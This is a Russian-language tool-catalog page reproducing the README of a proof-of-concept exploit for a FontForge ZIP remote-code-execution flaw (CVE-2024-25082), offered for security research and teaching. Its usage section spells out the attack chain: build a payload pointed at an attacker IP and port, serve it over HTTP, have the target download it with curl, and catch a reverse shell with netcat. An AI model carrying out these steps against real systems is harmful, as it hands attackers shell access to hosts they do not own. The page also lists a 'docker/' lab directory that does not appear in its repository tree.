Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-25082 — Эксплойт Proof-of-concept для CVE-2024-25082, демонстрирующий удаленное выполнение кода в FontForge через специально созданные ZIP-архивы. Включает генератор полезной нагрузки, лабораторию Docker и техническое описание для исследований в области безопасности и обучения. | Kitploit
Инструменты/GitHubGitHub/moamenx8/cve-2024-25082
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubmoamenx8/cve-2024-25082

CVE-2024-25082

Эксплойт Proof-of-concept для CVE-2024-25082, демонстрирующий удаленное выполнение кода в FontForge через специально созданные ZIP-архивы. Включает генератор полезной нагрузки, лабораторию Docker и техническое описание для исследований в области безопасности и обучения.

Репозиторий
55 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚠️ CVE-2024-25082 - Удаленное выполнение кода через ZIP в FontForge (PoC)

License Python CVE

Эксплойт Proof-of-Concept для CVE-2024-25082, уязвимости, затрагивающей FontForge, которая позволяет удаленное выполнение кода (RCE) через специально сформированный ZIP-архив.

Этот репозиторий демонстрирует, как уязвимость может быть эксплуатирована в контролируемой лабораторной среде для целей исследования безопасности и обучения.


Обзор уязвимости

  • CVE ID: CVE-2024-25082\
  • Затрагиваемое ПО: FontForge\
  • Тип уязвимости: Удаленное выполнение кода\
  • Вектор атаки: Вредоносный ZIP-архив\
  • Воздействие: Выполнение произвольных команд при обработке специально созданного архива.

Уязвимость возникает из-за неправильной проверки файлов внутри ZIP-архивов, что позволяет злоумышленнику выполнять произвольные команды на целевой системе.


Структура репозитория

root@kitploit:~
CVE-2024-25082-FontForge-ZIP-RCE/
├── README.md
├── exploit.py
├── poc/
│   └── exploit.zip
├── writeup.md
└── License

Файл Описание


exploit.py Создает вредоносный ZIP-загрузчик poc/ Содержит сгенерированные файлы доказательства концепции writeup.md Техническое объяснение уязвимости


Требования

  • Python 3.x
  • Netcat

Установка дополнительных инструментов:

root@kitploit:~
sudo apt install netcat

Использование

1️⃣ Создание вредоносной нагрузки

root@kitploit:~
python3 exploit.py --lhost <Your IP> --lport <Your Port>

Это создаст вредоносный файл exploit.zip.


2️⃣ Размещение эксплойта

root@kitploit:~
python3 -m http.server 8080

3️⃣ Загрузка с целевой системы

root@kitploit:~
curl http://<Your IP>:8080/exploit.zip -o /path/to/upload/directory/exploit.zip

4️⃣ Получение обратной оболочки

root@kitploit:~
nc -lvnp <Your Port>

При успешном выполнении с целевой системы будет получена оболочка.


Воспроизведение уязвимости

Воспроизводимая уязвимая среда предоставлена внутри каталога docker/.

Пример:

root@kitploit:~
cd docker/vulnerable_env
docker build -t fontforge-vuln .
docker run -p 8080:80 fontforge-vuln

Это позволяет безопасно тестировать без воздействия на рабочие системы.


Влияние на безопасность

Злоумышленник, способный загружать или контролировать ZIP-файлы, обрабатываемые уязвимым приложением, может:

  • Выполнять произвольные системные команды
  • Получать удаленный доступ к оболочке
  • Скомпрометировать хост-систему

Смягчение последствий

Рекомендуемые меры смягчения:

  • Обновите FontForge до исправленной версии
  • Проверяйте содержимое загружаемых архивов
  • Ограничьте функциональность загрузки файлов
  • Используйте песочницу при обработке шрифтов

Отказ от ответственности

Этот репозиторий содержит код Proof-of-Concept для публично раскрытой уязвимости.

Код предоставляется строго для:

  • Исследований безопасности
  • Образовательных целей
  • Авторизованного тестирования на проникновение

НЕ используйте этот код против систем без явного разрешения.

Автор не несет никакой ответственности за неправомерное использование или ущерб, причиненный этим программным обеспечением.


Автор

Moamen Elmaghrabi

Студент по кибербезопасности
Тестирование на проникновение и разработка эксплойтов


Лицензия

Этот проект лицензирован под лицензией MIT.
Подробнее см. в файле LICENSE.

Скачать инструмент